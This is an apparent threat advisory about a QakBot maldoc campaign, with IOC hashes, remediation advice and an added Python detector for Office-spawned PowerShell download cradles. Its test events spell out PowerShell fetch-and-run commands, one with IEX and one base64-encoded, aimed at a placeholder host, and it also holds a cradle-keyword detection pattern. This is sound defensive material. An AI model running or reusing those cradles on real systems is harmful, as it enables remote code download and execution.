Rewterz Threat Alert – SNAKE Ransomware – Active IOCs
September 28, 2021
Rewterz Threat Advisory – CVE-2021-20317 – Linux Kernel Vulnerability
September 28, 2021
Severity
High
Analysis Summary
A large-scale malicious-document (maldoc) campaign delivering the QakBot (QBot) banking trojan has been detected. QakBot uses advanced techniques to evade detection and hamper manual analysis. QakBot attacks typically begin with a phishing email carrying a malicious attachment, often a plain Microsoft Word or Excel document. This campaign uses an .xls file that contains macros; when run, the macros execute a PowerShell script that downloads the QakBot payload from specific URLs. To get the victim to enable macros, the attackers use a common lure: when the target opens the file, it prompts them to click "Enable Editing" and then "Enable Content" in order to view the document.
Impact
- Unauthorized Access
- Financial Theft
- Information Theft
Indicators of Compromise
MD5
- b19b0af9a01dd936d091c291b19696c8
SHA-256
- 17d261eaca2629ef9907d0c00fb2271201e466796f06dcb7232900d711c29330
SHA-1
- 862ed0b9586729f2633670ccd7d075d7693908e1
Remediation
- Block all threat indicators at your respective controls (email gateway, web proxy, endpoint protection).
- Search for the IOCs in your environment.
- File hashes change with every repacked sample, so complement hash blocking with behavioural monitoring: alert when Excel or Word spawns PowerShell, especially with a download cradle in the command line.
- Block macros in Office documents received from the internet, and remind users that a document asking them to "Enable Editing" and "Enable Content" before it can be viewed is a common lure.
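The two checks that follow from the chain in the Analysis Summary and from the remediation steps above, as an added example that is not Rewterz's own tooling: a hash hunt over files on disk using the alert's MD5/SHA-1/SHA-256 IOCs, and a behavioural check that flags process-creation events where Excel or Word spawns PowerShell with a download cradle, including one hidden behind -EncodedCommand. The event field names (parent_image, image, command_line) are assumed to follow Sysmon Event ID 1 / Windows 4688 conventions; the cradle keyword list, the sample events and the sample files are constructed for this example and do not come from the alert.

```python
"""IOC hash hunt plus Office->PowerShell download-cradle detection (added example)."""
import base64
import binascii
import hashlib
import ntpath
import os
import re
import tempfile

# Hashes quoted from the alert's Indicators of Compromise section.
IOC_HASHES = {
    "md5": {"b19b0af9a01dd936d091c291b19696c8"},
    "sha1": {"862ed0b9586729f2633670ccd7d075d7693908e1"},
    "sha256": {"17d261eaca2629ef9907d0c00fb2271201e466796f06dcb7232900d711c29330"},
}


def file_hashes(path):
    """Compute md5/sha1/sha256 of a file in one streamed pass (no full read into RAM)."""
    digests = {"md5": hashlib.md5(), "sha1": hashlib.sha1(), "sha256": hashlib.sha256()}
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            for d in digests.values():
                d.update(chunk)
    return {algo: d.hexdigest() for algo, d in digests.items()}


def hunt_hashes(root, iocs=IOC_HASHES):
    """Walk `root`; return [(path, algo, digest)] for every file whose hash is an IOC."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                digests = file_hashes(path)
            except OSError:
                continue  # unreadable or locked file: skip it rather than abort the hunt
            for algo, digest in digests.items():
                if digest in iocs.get(algo, ()):
                    hits.append((path, algo, digest))
    return hits


OFFICE_PARENTS = {"excel.exe", "winword.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Illustrative download-cradle fragments (assumption for this example, not from the alert).
CRADLE_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer", re.I
)
# -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)


def decoded_command_line(cmd):
    """Append the decoded -EncodedCommand payload (UTF-16LE base64) so CRADLE_RE can see it."""
    m = ENC_RE.search(cmd)
    if not m:
        return cmd
    try:
        return cmd + " " + base64.b64decode(m.group(1)).decode("utf-16-le", "ignore")
    except (binascii.Error, ValueError):
        return cmd  # malformed base64: fall back to the raw command line


def is_macro_cradle(event):
    """True when an Office app spawns a PowerShell host whose command line downloads something."""
    parent = ntpath.basename(event.get("parent_image", "")).lower()  # ntpath handles C:\ paths on any OS
    child = ntpath.basename(event.get("image", "")).lower()
    if parent not in OFFICE_PARENTS or child not in SCRIPT_HOSTS:
        return False
    return CRADLE_RE.search(decoded_command_line(event.get("command_line", ""))) is not None


def _enc(ps):
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(ps.encode("utf-16-le")).decode()


EXCEL = r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed process-creation events, not from the alert
    {"parent_image": EXCEL, "image": PS,
     "command_line": "powershell -nop -w hidden (New-Object Net.WebClient)"
                     ".DownloadFile('http://example.invalid/a.dat','C:\\Users\\Public\\a.dat')"},
    {"parent_image": EXCEL, "image": PS,  # same cradle hidden in -EncodedCommand
     "command_line": "powershell -nop -w hidden -enc "
                     + _enc("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/b')")},
    {"parent_image": r"C:\Windows\explorer.exe", "image": PS,  # a download, but not macro-spawned
     "command_line": "powershell Invoke-WebRequest http://example.invalid/c -OutFile c.dat"},
    {"parent_image": EXCEL, "image": PS,  # Office -> PowerShell, but no download
     "command_line": "powershell -Command Get-Date"},
]


def demo_hash_hunt():
    """Constructed demo: a decoy 'invoice.xls' whose SHA-256 (the standard 'abc' test
    vector) is added to the IOC set, next to a benign file. Returns the sorted hits."""
    iocs = {algo: set(v) for algo, v in IOC_HASHES.items()}
    iocs["sha256"].add("ba7816bf8f01cfea414140de5dae2223b00361a396177a9cb410ff61f20015ad")
    with tempfile.TemporaryDirectory() as d:
        with open(os.path.join(d, "invoice.xls"), "wb") as f:
            f.write(b"abc")
        with open(os.path.join(d, "notes.txt"), "wb") as f:
            f.write(b"quarterly numbers attached")
        return sorted((os.path.basename(p), algo, h) for p, algo, h in hunt_hashes(d, iocs))


if __name__ == "__main__":
    print("hash hits:", demo_hash_hunt())
    for ev in SAMPLE_EVENTS:
        print(is_macro_cradle(ev), ev["command_line"][:60])
```

The behavioural check only looks at the direct parent; where the macro goes through an intermediate cmd.exe or wscript.exe, extend it with a process-tree lookup from your EDR or Sysmon data. The decoy file in demo_hash_hunt uses a published test vector rather than a real sample so the example runs offline; point hunt_hashes at user profile and temp directories with the default IOC_HASHES for a real sweep.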